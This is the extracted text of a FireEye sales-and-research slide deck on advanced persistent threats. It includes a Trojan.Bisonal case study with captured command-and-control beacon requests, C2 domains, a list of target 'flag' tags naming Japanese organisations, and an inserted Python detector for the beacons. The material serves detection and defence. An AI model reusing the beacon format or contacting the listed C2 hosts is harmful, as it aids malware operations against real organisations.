wMPS Dashboard


Stopping Next-Gen Threats

Dan Walters – Sr. Systems Engineer Mgr.

Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1


"We're moving towards a world where every attack is effectively zero day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works."

- Chris Young, GVP Cisco, Security Tech Week Europe, September 28th 2012

High Profile APT Attacks Are Increasingly Common

The Attack Lifecycle – Multiple Stages

[Diagram: callback server; compromised Web server or Web 2.0 site; IPS; DMZ; File Share 1; File Share 2]

1 Exploitation of system
2 Malware binary download
3 Callbacks and control established

Crimeware == for the $

Advanced Persistent Threat == Human

This is Alex == FireEye Research

The Usual Suspects

Organized…Persistent…

Reconnaissance made easy…

The Exploit

LaserMotive

CEOs are targeted

Could you stop this?

The Callback

Hidden in plain view…

Blog Post?


RSS Feed?

We’re Only Human

HR makes for easy targets

Just doing my job…

NATO is a frequent spearphish target

Global Unrest

Whose Oil is it?

The curious case of Trojan.Bisonal

• Targets 100% Japanese organizations
• Delivered via weaponized doc/xls files
• Embeds the target name into the command and control traffic

Custom “Flag” and c2 domain

GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: �� proxy: ��
Host: online.cleansite.us
Cache-Control: no-cache

GET /a.asp?id=* HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: khi.acmetoy.com
Connection: Keep-Alive

Other “Flag”s seen

• flag:410maff <-- ministry of agriculture, forestry, and fisheries
• flag:1223
• Flag:712mhi <-- mitsubishi heavy industries
• Flag:727x
• Flag:8080
• Flag:84d
• flag:boat
• Flag:d2
• Flag:dick
• flag:jsexe
• flag:jyt
• Flag:m615
• flag:toray
• Flag:MARK 1
• flag:nec01 <-- nec corporation
• Flag:qqq
• flag:nids <-- national institute for defense studies (nids.go.jp)
• flag:nsc516 <-- nippon steel corp
• flag:ihi <-- ihi corp
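The two slides above give defenders something concrete to match on: the Bisonal beacon carries its target tag, victim hostname, IP and OS in the User-Agent header (flag:khi host:Business IP:10.0.0.43 OS:XPSP3 ...), and the list of flags maps several tags to the organisations they stand for. The following detector is an added example, not FireEye code or anything from the deck: it parses raw HTTP requests, matches the beacon layout shown on the slide, and annotates a hit with the slide's flag legend. It assumes the User-Agent fields are whitespace-separated key:value tokens in the order flag/host/IP/OS; the sample requests are constructed, the vm/proxy values (which did not survive on the slide) are placeholders, and c2.example.invalid is a made-up host.

```python
"""Detect Trojan.Bisonal-style beacons by their custom User-Agent.

Added illustration, not FireEye code. The beacon layout and the flag legend
come from the slides; the sample requests below are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Beacon User-Agent layout shown on the slide:
#   flag:<target tag> host:<victim hostname> IP:<victim ip> OS:<victim os> vm:.. proxy:..
# Assumption: whitespace-separated key:value tokens, always starting flag/host/IP/OS.
BEACON_UA_RE = re.compile(
    r"^flag:(?P<flag>\S+)\s+host:(?P<host>\S+)\s+IP:(?P<ip>\S+)\s+OS:(?P<os>\S+)",
    re.IGNORECASE,
)

# Flags listed on the slides (lower-cased). Where the slide names the organisation
# a flag stands for, it is recorded; the others have no legend on the slide.
# "mark" is the slide's "Flag:MARK".
KNOWN_FLAGS: Dict[str, Optional[str]] = {
    "khi": None,
    "410maff": "ministry of agriculture, forestry, and fisheries",
    "1223": None, "712mhi": "mitsubishi heavy industries",
    "727x": None, "8080": None, "84d": None, "boat": None, "d2": None,
    "dick": None, "jsexe": None, "jyt": None, "m615": None, "toray": None,
    "mark": None, "nec01": "nec corporation", "qqq": None,
    "nids": "national institute for defense studies (nids.go.jp)",
    "nsc516": "nippon steel corp",
    "ihi": "ihi corp",
}


def parse_http_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into (request line, header map).

    Header names are lower-cased; a duplicate header keeps its last value.
    """
    lines = raw.strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return (lines[0].strip() if lines else ""), headers


def detect_bisonal_beacon(raw: str) -> Optional[Dict[str, object]]:
    """Return the fields leaked in the User-Agent if the request looks like a
    Bisonal beacon, otherwise None."""
    request_line, headers = parse_http_request(raw)
    m = BEACON_UA_RE.match(headers.get("user-agent", ""))
    if not m:
        return None
    flag = m.group("flag")
    return {
        "request_line": request_line,
        "c2_host": headers.get("host"),       # the Host header is the C2 domain
        "flag": flag,
        "victim_host": m.group("host"),
        "victim_ip": m.group("ip"),
        "victim_os": m.group("os"),
        "known_flag": flag.lower() in KNOWN_FLAGS,
        "target_legend": KNOWN_FLAGS.get(flag.lower()),
    }


def scan_requests(requests: List[str]) -> List[Dict[str, object]]:
    """Run the detector over captured requests and keep only the hits."""
    return [hit for hit in map(detect_bisonal_beacon, requests) if hit]


# Constructed sample traffic: the first mirrors the slide's beacon (vm/proxy
# values are placeholders), the second is the slide's follow-up request with an
# ordinary browser User-Agent, the third is a constructed beacon using another
# flag from the slide's list and a made-up C2 host.
SAMPLE_REQUESTS = [
    "GET /j/news.asp?id=* HTTP/1.1\r\n"
    "User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm:0 proxy:0\r\n"
    "Host: online.cleansite.us\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /a.asp?id=* HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)\r\n"
    "Host: khi.acmetoy.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /j/news.asp?id=* HTTP/1.1\r\n"
    "User-Agent: Flag:nids host:WKSTN-7 IP:10.0.0.77 OS:XPSP3 vm:0 proxy:0\r\n"
    "Host: c2.example.invalid\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

The second request shows why the flag is worth matching rather than the domain alone: the follow-up to khi.acmetoy.com uses a stock IE7 User-Agent and would pass a UA-only rule, so in practice the hit on the first request should be used to pivot onto the victim IP it reports and review that host's other outbound connections.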

China is not the only threat

Multi-Protocol, Real-Time VX Engine

PHASE 1: Multi-Protocol Object Capture

PHASE 1: WEB MPS
• Aggressive Capture
• Web Object Filter

PHASE 1: E-MAIL MPS
• Email Attachments
• URL Analysis

PHASE 2: Virtual Execution Environments
Map to Target OS and Applications

DYNAMIC, REAL-TIME ANALYSIS
• Exploit detection
• Malware binary analysis
• Cross-matrix of OS/apps
• Originating URL
• Subsequent URLs
• OS modification report
• C&C protocol descriptors

Thank You!

FireEye - Modern Malware Protection System